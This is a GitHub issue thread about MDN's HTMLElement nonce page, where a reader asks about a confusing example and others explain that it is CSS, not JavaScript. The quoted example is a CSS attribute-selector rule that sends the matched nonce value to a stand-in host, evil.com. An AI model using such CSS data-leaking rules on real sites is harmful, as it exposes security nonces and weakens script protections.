### ISSUE TITLE
Confusing example of malicious code

### ISSUE THREAD

**Issue by TheMalgot** [mdn/content#20891]
### MDN URL

https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/nonce

### What specific section or headline is this issue about?

Examples

### What information was incorrect, unhelpful, or incomplete?

The example of malicious code is very hard to understand for newcomers.

`script[nonce~="whatever"] {
  background: url("https://evil.com/nonce?whatever");
}`

I have a hard time understanding what this code actually means.

### What did you expect to see?

More details on what exactly happens here. It is hard to find anything helpful googling parts of this code and receiving helpful answers.
From the context, it seems that 'script' is an array. The part about

`script[nonce~="whatever"]`

confuses me especially. From what I know, a binary NOT is made on the value "whatever" and then assigned to a value called nonce? I'm lost on anything that follows from that point on.

### MDN metadata

<details>
<summary>Page report details</summary>

* Folder: `en-us/web/api/htmlelement/nonce`
* MDN URL: https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/nonce
* GitHub URL: https://github.com/mdn/content/blob/main/files/en-us/web/api/htmlelement/nonce/index.md
* Last commit: https://github.com/mdn/content/commit/c09b8e9dd0022a33cf84355704ca281d6a5f29f5
* Document last modified: 2022-09-13T07:59:37.000Z

</details>

**Comment by TheMalgot** [comment]
> This is a CSS selector, not JS code.

😅 Great, thanks. I wasn't aware of that.

**Comment by Josh-Cena** [comment]
This would be a single-sentence fix to explain that the block is CSS, not JS.
